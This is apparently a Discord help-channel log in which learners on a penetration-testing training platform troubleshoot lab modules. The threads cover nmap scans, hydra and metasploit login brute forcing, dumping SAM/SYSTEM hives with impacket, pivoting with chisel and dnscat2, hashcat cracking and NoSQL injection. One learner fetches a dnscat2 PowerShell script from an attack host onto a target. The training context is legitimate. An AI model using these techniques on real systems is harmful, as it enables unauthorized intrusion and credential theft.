Why when i use nmap =p- 10.129.180.54 (the ip from hb to check telnet host)
nmap say: Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-10 19:25 +04
Failed to resolve "=p-".
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 3.18 seconds
if i use -Pn nothing change

-p-

it's explained in the module itself

#1216409290659725402 message

who's the slow one

https://tenor.com/view/monsters-university-snail-going-on-my-way-omw-gif-5461800

I use netcat to do port scanning 🙂

net

map -p- 10.129.180.54
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-10 19:38 +04
Nmap scan report for 10.129.180.54
Host is up (0.0013s latency).
All 65535 scanned ports on 10.129.180.54 are in ignored states.
Not shown: 65535 filtered tcp ports (no-response)

Nmap done: 1 IP address (1 host up) scanned in 105.42 seconds

well is that the right ip? give more information, module and section

GM! Still hung up on this and if anyone could assist I'd really appreciate it. Do I have to attempt the login after grabbing the creds on the site itself or via a command line?

Try nmap -sVC -p- <target_ip>

ip from hb to check telnet host
it should display the open host telnet, but it doesnt

what is the module and section

is the ip from the traget after you've spanwed it

I think getting started module service scanning section

start module (meow)

yes

what?

nmap -sVC -p- 10.129.180.54
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-10 19:46 +04
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 3.54 seconds

starting point?

yes

read #welcome , get verified and ask in #starting-point

Add the -Pn command to it
nmap -sVC -Pn -p- <target_ip>

if hydra shows password found you should be able to login

I tried logging in on the site itself and the pages refreshes without any error codes or pop-up messages after entering in creds

I thought I could automate the login attempt via cURL and it would show me the HTML source of the HTB{} flag, but it did not

idk what section you're doing but if you were to submit login over http form it will be more diffcult with curl

reset the target and try again

Login Brute Forcing Module and Login Form Attacks section

May I PM you a SS?

you can get verified and send screenshots, read #welcome

still scaning

Hey guys, i am stuck on this question from the documentation & reporting module

Connect to the testing VM using Xfreerdp and practice testing, documentation, and reporting against the target lab. Once the target spawns, browse to the WriteHat instance on port 443 and authenticate with the provided admin credentials. Play around with the tool and practice adding findings to the database to get a feel for the reporting tools available to us. Remember that all data will be lost once the target resets, so save any practice findings locally! Next, complete the in-progress penetration test. Once you achieve Domain Admin level access, submit the contents of the flag.txt file on the Administrator Desktop on the DC01 host.

I just don't how to get it to work any tips are appreciated thank you

i can give you a few tips

Regarding the brute forcing skills Assessment, im on the ssh Part where you need to create your custom wordlist. The password policy, meaning 8 chars or longer, special chars and numbers should also be taken into consideration correct?

Im currently going through Linux fundamentals. Does anyone have any good docs for regex commands? Man grep and 7 regex doesn’t really provide info on operators to work out patterns that begin or end. I realised I had to use \b to find ending patterns but via stackoverflow discovery. I’d like to make a cheat sheet.

regex101.com is a nice playground

hello
in the module attacking common service the question in the dns section: Find all available DNS records for the "inlanefreight.htb" domain on the target name server and submit the flag found as a DNS record as the answer.

i added the target to the resolvers.txt file, but get always the message: Warning: No nameservers found, trying fallback list.

why is that?

What exactly is in your resolvers.txt file?

the ip address of my target

the spawned taget ip

send me the command you are using via DM.

can anyone guide me about htb student subs...???

What exactly do you want to know?

Are the EU VPN facing issues rn?

aaaahhhh found my mistake 😉

i want to k know if i subscribe then after the end of month the moudle i completed can i go through from them later or not . like the modules only open in subs..???

once you buy a module with cubes you keep it forever

All modules that you have completed 100% during the subscription period are yours. You can no longer access all other modules once the subscription has expired.

ok thanks

Except, of course, the ones you bought with cubes. These are always yours.

where?

hey guys ........ i think there is something wrong in here
i'm doing the Nmap module and i reached this part.
can somebody explain me how the tcp connect scan is more stealthy than the syn scan ?
cause i thought that initiating a full connection (3 way handshake) will trigger alerts).

the SYN scan does not complete the 3-way handshake which may be indicative of network/port scanning

an unfinished TCP handshake is more suspicious than a completed handshake

DACL attacks, I'm trying to dump the SAM & SYSTEM registry hives and it dumps SAM, but it hangs after that and doesn't dump SYSTEM. I tried a couple different versions of impacket but they all result in the same thing. Am I doing something wrong?

thanks man for the help ......i really appreciate it !

Thanks brosef

yess please!

I'm having the same problem on the attackbox, this is making the module impossible to complete.

dm

Attacking Enterprise Networks - Web Enumeration & Exploitation. There is a section on http verb tampering on dev.inlanefreight.local.

I keep getting a communication error/no route to host when using burp on this part. Burp works on regular sites and the other vhosts. I do get the expected results when using curl. But when using burp I get communication error/no route to host.

I resolved it. Posting resolution here - nano/hosts had previous IPs not hashed out that had the dev.inlanefreight.local. Removed, restarted good to go.

alright i think i found my problem - it takes a long time lol. gotta wait like 5+ mins

hmm actually it only worked on the attackbox like that, not working on the vm, seems to be timing out.

you can dump it one buy one and save it locally, then get the file over smb

not sure what you mean. the files are dumped without issue. the problem is retrieving the files over smb via reg.py

yeah you save it on the system itself then retrive it with smbclient instead of doing everything at once

Working with IDS/IPS
Intrusion Detection With Zeek

There is a file named revilkaseya.pcap in the /home/htb-student/pcaps directory, which contains network traffic related to the REvil ransomware Kaseya supply chain attack. Enter the total number of bytes that the victim has transmitted to the IP address 178.23.155.240 as your answer.

Dumb question but isn't it supposed to be the addition of everything in the length ?

I still don't get what you're saying. When I perform the steps on the attack box, it works. When I do it on my own VM, it doesn't.

it hangs after retrieving SAM.save and never grabs the other file

it also did fail on the attack box a couple times i had to do it a few times (same commands, never rebooted machine)

the only difference is i tried impacket v9 and v11, while the attackbox is using v10. maybe something is up there idk.

regardless the attackbox will allow me to complete this, although i'd like to be able to do it without the attackbox.

Can SB help me with the bash scripting module?
Im really stuck 😐
I even wrote the same script in node but I still don't get the flag :/

It works on the virtual linux machine but not on my mac 😮

save the reg dump on the target system itself, then retrieve it using smbclient after it's been saved, so that even if it fails, you can just download the file again instead of having to dump it again

gotcha

this particular spot is "from linux" though

SYSTEM hive will take the longest to transfer, the other two should be pretty quick

alright. thank you.

Anyone having trouble connecting with module target systems?

i am

doesn't seem stable enough to download the system hive

Thanks @fathom pendant

I tried different answers and nothing seems to work I don't know if I'm on the good thing

other people on the network trying to log into my smb server? [*] Incoming connection (190.217.48.58,54787), also getting connections from other random addresses that aren't mine

i cannot get this dang flag because the system won't transfer this reg file

Did you tried to do it via virtual box, and create server on VB? When i did it, it worked... Or anybody scanning you 😄 😄 😄

Hello people
Is it just me who sometimes feels that it is impossible to finish studying, or am I really stupid? 😄 Sometimes I don't have the strength, and I feel like giving up

this is me 80% of the time

sometimes you just need to take a break and have fresh eyes on it. i find sometimes i get lost in the weeds and just need to come back and rethink it simpler

taking breaks helps a lot

you get burnt out super bad if you keep chugging along

Iam doing actually something like preparation course into ethical hacking company, and still learning on portswigger, and on htb academy too... But, sometimes i think, that it's my end, and i am the most stupid man on the world 😄 :D: D

i cant... because iam type of the people, if i take break one day, then i will say "i will do it tomorrow" and again, and again... 😄 Its hardest to start like to stop 😄

taking regular 1 hour breaks during study sessions is OK

ahaaaaa, this you thought, yes, its true 🙂

you can also take a break in between modules, like i just finished the yara and sigma module and i'm taking a break before going into digital forensics

and if you're itching for something to test your knowledge, there's always HTB main platform

wireshark has analysis features for this that show you how much traffic moves between two ips. If you add up just the length you may add up headers too

i have every week one topic... For example, now i studying LFI/RFI, but week ago it was SSRF...

check statistics -> conversations

I tried it but still dosen't work

ipv4 tab?

yes ive tried it aswell

can i dm you

can you remove the display filter and enlarge the column for bytes? it shouldnt show kB

it still stay in kb for some reasons

oh derp, you are doing zeek, you are not supposed to use wireshark. Basically look at the example number 3 again and do what they do there, there is a long command that leaves you with a list of ips and how much data gets exfiltrated

oh ok

that's what I tought I was not doing the good thing

I'm getting this error for some reason

Hi, I'm new for capture flags , I'm try blockchain_russian_roulette, I get from option 3 : get the flag. "conditions not satisfied" any tip, help on that to figure it out? Thank you

this channel isn't for ctfs

#1204440084867325982 is for the ongoing ctf

I 'm come back : If this can help others:

Solution:

I use the scanner module from metasploit:

auxiliary(scanner/smb/smb_login)

it work for me as expected: trying all passwords for a given user before moving to the next user.

Thanks

careful with posting spoilers especially if the issue you were having was a user related issue - not a tool issue

:)

hello, i completed the section Dsync attack in AD , but when i try to do it using portforwarding it wont work , the first pivot works well from windows to ssh , but then i tried to double port forward using ssh dynamic port forwarding , and then tried to perform the command in my attack host but didnt work

|| ||

looks like a pivoting problem instead of a dcsync problem

What am I supposed to change this domain to for this to work?

yes

Assuming this is even because of the domain and not an issue with the dnscat2 app itself

i had socks5 and socks4 on my proxyconfig file lol

i fixed it now

ecdsa is some crypto stuff, sounds like you are missing some library install or something

dnscat has a similar error on their github and suggests installing ruby-dev

I'm having similar issues with chisel now. I uploaded it to the pivot host but the pivot host is missing the lib files necessary to run chisel

I can't install go on it and I can't update the libraries on the pivot host, so I'm not sure what to do with this exercise. The module certainly doesn't address it.

Is it just me or CBBH's server side skill assessment was anti-climatic? Or did I do something wrong?

I was able to answer the module questions by doing a standard proxychains port forward, but it sucks that I can't get the tools the lessons want me to use to work.

Hey guys, I'm on the "Nosql injections" module at the moment and I'm stuck on the skills assessment #2. || I've tried to inject into all parameters on various endpoints(/login, /forgot, /reset), I heard it has somehting to do with time based injections which I also tried but sadly couldn't make anything work|| Any hints? Thank you 🙂

Take a close look at the message on the website when you log in. Do you notice anything?

Do you mean the placeholders 😄

I actually tried to quite a bit of queries based on those values

I feel like I'm over complicating things here 😂

Yes exactly, try the placeholder. Then try something that certainly doesn't exist.

You need to compile chisel statically. Or download a pre-compiled binary of it

The reason it doesn't work is bc your version of glibc that you compiled chisel with isn't the same as the target

I'm guessing it's the time difference in the responses ya?

This should also work, ||but take a close look at the two messages||

So it's just different versions. Kind of like how I couldn't adjust rpivot's server.py to conform to python3 standards and have it still work with the python2.7 client.py

Exactly, you're not gonna get a py3 program to run on py2

I spent like 15 mins manually changing all the errors in the python2.7 version of server.py to python3 and it was for nothing lol

I mean, you can just install python2.7

I'm guessing I have to find it online since I can't apt install it

You might be able to install with pip

Gotcha, I think I spotted that little difference, but why does it happen though? ||That combination from the placeholder is also not valid no?|| Edit : Ahh I think I get it. Thanks a ton Mr. Bunny!

Also I had no issues installing 2.7 on my machine

I tried. I keep getting the error: exernally-managed-environment result

I get that with a lot of pip install attempts

And now this

Real-Time protection is running

Is that in Windows Security? All those options are turned off.

I believe so

It's specifically under virus& threat protection

Found it, and it worked.

Network Enumeration with NMAP, chapter "Host Discovery" is confusing me. What is exactly the IP target I should scan? I've tried to start the workstation instance and ran a test with the last IP showed in the examples, but host seems down(even with -Pn I can"t get results, coz system get stalled)

usually at the very bottom in the question area there's a link you click to start up the victim box

after it starts it shows the ip there

there is no button 😦

it doesn't say do the scan yourself it just says based on the last result.. so the answer is probably on that same page? what's the hint say?

idk i didn't do that module so..

"Based on the last result"

look at the last result on the page

That was bad reading. My bad, guys! Thank you!

Struggling with https://academy.hackthebox.com/module/113/section/2139 (Attacking Thick Client Applications) and could use a hand if anyone is able.

I've successfully completed the steps up to "run again the Restart-OracleService.exe and check the temp folder. The file 6F39.bat is created under the C:\Users\cybervaca\AppData\Local\Temp\2" - but rerunning Restart-OracleService.exe doesn't seem to generate the files as advertised 🤔

what's the step before that

Is there a worse sections in the CPTS than the Thick client sections in Attacking Client Applications... So frustrated, got through the first one and now stuck on FTP client one... Would be fine if the windows VM wasnt so slow...

its because the steps are straight up wrong

so you have to deep dive outside the module on how to compile java

walkthrough of a retired insane machine: Fatty has helped many

i get the exercise but it's pretty advanced for a medium module, it should be reworked to explain it better

I am watching Ippsec's video on Fatty right now

the addition of this section was highly contentious when it came out

his video didn't help me at all

he uses a completely different tool and you can't dl stuff on that box

people did NOT like it; and they updated it to be slightly better

the commands they give are wrong too

you can't dl stuff to the machines in the labs either

it's all about tool transfers

yeah but you shouldn't need to do that

¯_(ツ)_/¯

the module itself should contain everything required to pass the questions. simple as that.

you should not need outside resources and learning about a tool completely irrelevant to the module's spirit

¯_(ツ)_/¯

when you complete it leave a review regarding that section

if it does do that, then it needs to hand hold you, not force you to go outside the module. especially when the commands it gives you to paste are straight up wrong

and it does not explain the command you're running at all

again this section was a late addition and definitely not proofread

i watched the fatty video, skipped to the end to see the ip, and put that in the answer box and moved on

the rest of the module was absolutely awesome

it's also possible you're doing something incorrect and trying to blame the module ¯_(ツ)_/¯

but if you're saying you followed it 1::1 then i'll believe you

yeah, you can't follow it 1:1

i just completed that yesterday

this helps a lot https://0xdf.gitlab.io/2020/08/08/jar-files-analysis-and-modifications.html

Oh Jesus

Listen the thick applications part is seriously out of place.

It's not easy for anybody.

yeah, i'm not arguing that it isn't

it just sucks

Changing the folder permissions.

(Now very much not looking forward to the rest of it 🙈)

did you complete that part? after that i found it a bit buggy, i had to start and ctrl-c and start the service a couple times

so try messing with the executable like that and it should dump it

I did, yeah, still no files being generated though 🤷

I ran the restart 5 or 6 times (which took a billion years).

Guess I'll try and reset the VM and try again 😔

Thank you

How did you install dnscat2? It requires the ecdsa library, which can be installed via sudo gem install ecdsa. Or run bundle install if you're trying to run it directly out of it's directory.

💀

DACL attacks - Change the credentials for the account Yolanda. Then, connect to the shared folder \DC01\yolanda\ and submit the contents of flag.txt as the answer. How am I supposed to grab this flag? yolanda doesn't have rights to connect to the computer, after changing her creds i can't get into the share folder with them to get the flag either. can't do it with smbclient, cme, or manually going to the folder and entering the password on the windows host.

why wouldn't the user have the rights to access their own folder?

no idea

they should

Welp, I give up for now. If anyone knows what I'm doing wrong, I'd greatly appreciate a DM that I can follow up later 🤷

i'm sure i'm just missing something obvious otherwise this box is busted

the creds successfully authenticate, but she doesn't have perms to anything

wtf is this section

I have no idea, I'm like two steps in and already pulling my hair out. When looking things up to try and find out what I have wrong, all I'm seeing are a mountain of complaints and criticisms of this section. Feels like bruteforcing the answer and skipping it may be the way forward 😂

this section is absolutely insane

Pls send hlp.

Password attacks under a password shadow and o password. Hashcat is jammed up and is asking me to click status pause bypass checkpoint or quit. I can’t get it to work. Hashcat -O -m 1800 root.hash mutated.list -o cracked.hash

it's not jammed up; that's litereally just how hashcat shows it's working

I also don't see a -O option for hashcat but it's been a minute since i looked at the docs

oh right -O is optimized kernels

which is highly unnecessary

Figured it out

Another lesson on not being patient

😩

if anyone can nudge me with this dacl thing that'd be cool

really not sure what i'm doing wrong it says to change yolanda's password and use that to get the flag on her folder, the password change is successful but there's no way to log in to the box with her creds and she doesn't seem to have access to that folder

Boxes are addicting like a drug. Can’t stop won’t stop

wow, randomly it worked this time

need some help on DNS Tunneling with Dnscat2.. the part where you first get on PS on the target, you run the cmd "Import-Module .\dnscat2.ps1" i get an error saying it wasn't loaded because no valid module.. how am i supposed to import the file, it gets totally glossed over..

that command, Import-Module imports it

check in c:\tools or something

.\ implies the tool is in the current directory

otherwise you either need to move to the directory or use the full filepath

yeah looks like i need to go back and look up upload methods

is it not in C:\tools?

theres no tools dir

file transfers it is then

just host a web server on your attack box with the dnscat2.ps1 and use invoke-webrequest from powershell

okay trying that.. used "python3 -m http.server" on attack host. on target host, using PS i run "invoke-webrequest -URI http://10.10.14.20:8000/home/kali/dnscat2-powershell/dnscat2.ps1" and i see on my attack host myself connecting however with the error that the file doesnt exist, i double checked.. its there

you need to specify the -outfile

also: that's not how http.server works

http.server launches the server from the directory you're currently in